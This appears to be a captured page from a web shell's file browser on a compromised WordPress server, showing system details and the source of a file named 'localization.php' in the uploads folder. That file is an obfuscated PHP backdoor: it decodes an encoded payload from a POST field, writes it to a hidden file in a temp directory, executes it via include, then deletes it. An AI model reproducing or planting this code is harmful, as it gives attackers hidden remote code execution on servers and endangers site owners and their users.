HEX
Server: Apache/2.4.59 (Debian)
System: Linux keymana 4.19.0-21-cloud-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
User: lijunjie (1003)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/thaler/wp-content/uploads/2025/
Upload Files
File: /var/www/thaler/wp-content/uploads/2025/localization.php
<?php

if(!empty($_POST["\x72e\x63"])){
	$hld = array_filter([getenv("TMP"), sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp", session_save_path(), getenv("TEMP")]);
	$property_set = $_POST["\x72e\x63"];
	  	$property_set  =	 explode		 (".", 		$property_set			)	  ; 
	$data=	 '';
            $salt9=	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=	 strlen($salt9	 );
    
            foreach($property_set as $j=>	$v2):
                $sChar=	 ord($salt9[$j % $lenS]	 );
                $dec=	 ((int)$v2 - $sChar -($j % 10)) ^ 12;
                $data.=	 chr($dec	 );
            endforeach;
	$token = 0;
do {
    $flg = $hld[$token] ?? null;
    if ($token >= count($hld)) break;
    		if (!!is_dir($flg) && !!is_writable($flg)) {
    $item = str_replace("{var_dir}", $flg, "{var_dir}/.flag");
    if (file_put_contents($item, $data)) {
	include $item;
	@unlink($item);
	die();
}
}
    $token++;
} while (true);
}
@ Telegram